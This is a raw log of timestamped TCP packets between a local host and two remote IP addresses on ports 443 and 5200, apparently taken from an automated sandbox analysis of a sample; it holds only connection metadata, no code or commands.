                                                                                                          Dec 9, 2024 07:37:29.985363960 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.985570908 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.988420963 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.988492966 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:29.989191055 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:30.032015085 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.079329967 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.108510017 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.470489979 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.470669031 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.471802950 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.471811056 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.472057104 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.472893953 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.515336037 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662792921 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662825108 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662832975 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662844896 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662877083 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.663109064 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.663109064 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.663126945 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.663184881 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.781657934 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781675100 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781745911 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.781769991 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781807899 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.848726988 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.848745108 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.848989964 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.849008083 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.849056005 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.945588112 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945605993 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945696115 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.945712090 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945756912 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.978574038 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978589058 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978698015 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.978708982 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978754044 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.010188103 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010204077 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010288954 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.010304928 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010350943 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.070868969 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.729500055 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.729542971 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.735667944 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.735683918 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.735744953 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.735753059 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.735793114 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.742376089 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.742396116 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.742450953 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.742461920 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.742500067 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.799034119 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.799052000 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.799148083 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.799163103 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.799205065 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.808254004 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.808270931 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.808362961 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.808382034 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.808439016 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.811089039 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.811105013 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.811181068 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.811194897 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.811242104 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.815860987 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.815879107 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.815948009 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.815956116 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.815995932 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.817045927 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.817060947 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.817122936 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.817133904 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.817173004 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.824718952 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.824737072 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.824811935 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.824819088 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.824861050 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.833456993 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.833472967 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.833553076 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.833560944 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.833616018 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.841718912 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.841736078 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.841810942 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.841818094 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.841860056 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.851515055 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.882178068 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:31.882689953 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.903743982 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.903768063 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.903879881 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.903908014 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.903954983 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.904970884 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.904990911 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.905031919 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.905040979 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.905067921 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.905082941 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.907835960 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.907852888 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.907897949 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.907905102 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.907936096 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.907948971 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.913861036 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.913877010 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.913952112 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.913959026 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.914002895 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.914208889 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.914225101 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.914263010 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.914272070 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.914297104 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.914314985 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.920581102 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.920597076 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.920672894 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.920680046 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.920716047 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.926600933 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.926618099 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.926687002 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.926692963 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.926729918 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.932527065 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.932543039 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.932599068 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.932607889 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.932636976 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.932650089 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.934462070 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.990308046 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.990334034 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.990380049 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.990392923 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.990422010 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.990434885 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.997200966 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.997216940 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.997265100 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.997272968 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.997302055 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.997315884 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.001384974 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.002748966 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.002765894 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.002814054 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.002831936 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.002846003 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.002868891 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.004054070 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.004070997 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.004106998 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.004112959 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.004137039 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.004156113 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.009134054 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.009152889 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.009200096 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.009217978 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.009227991 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.009253025 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.010144949 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.010160923 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.010196924 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.010204077 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.010214090 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.010238886 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.017438889 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.017455101 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.017508984 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.017518044 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.017559052 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.023499966 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.023523092 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.023556948 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.023564100 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.023590088 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.023607969 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.093588114 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.093605995 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.093677044 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.093693018 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.093734980 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.096560955 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.096577883 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.096628904 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.096638918 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.096663952 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.096682072 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.099867105 CET44349738154.216.20.243192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 07:37:32.099883080 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.099965096 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.099973917 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.100012064 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.102272034 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.102292061 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.102328062 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.102334023 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.102360010 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.102375031 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.106111050 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.106127977 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.106187105 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.106198072 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.106235027 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.111699104 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.111725092 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.111763954 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.111772060 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.111798048 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.111813068 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.118443012 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.118458986 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.118494034 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.118504047 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.118529081 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.118540049 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.123819113 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.123835087 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.123892069 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.123900890 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.123939991 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.182193995 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.182220936 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.182272911 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.182297945 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.182331085 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.182356119 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.187747002 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.187762976 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.187810898 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.187819004 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.187863111 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.193340063 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.193356991 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.193417072 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.193424940 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.193466902 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.195043087 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.195066929 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.195168972 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.195180893 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.195219994 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.199419022 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.199434996 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.199476957 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.199482918 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.199510098 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.199523926 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.200618982 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.200634003 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.200675964 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.200685024 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.200709105 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.200721979 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.204627991 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.204654932 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.204709053 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.204715967 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.204747915 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.204766989 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.209722042 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.209739923 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.209791899 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.209800959 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.209844112 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.286175966 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.286206961 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.286274910 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.286290884 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.286330938 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.288837910 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.288856983 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.288907051 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.288922071 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.288944960 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.288952112 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.291640043 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.291655064 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.291711092 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.291719913 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.291757107 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.297023058 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.297044039 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.297085047 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.297100067 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.297111988 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.297138929 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.298847914 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.298870087 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
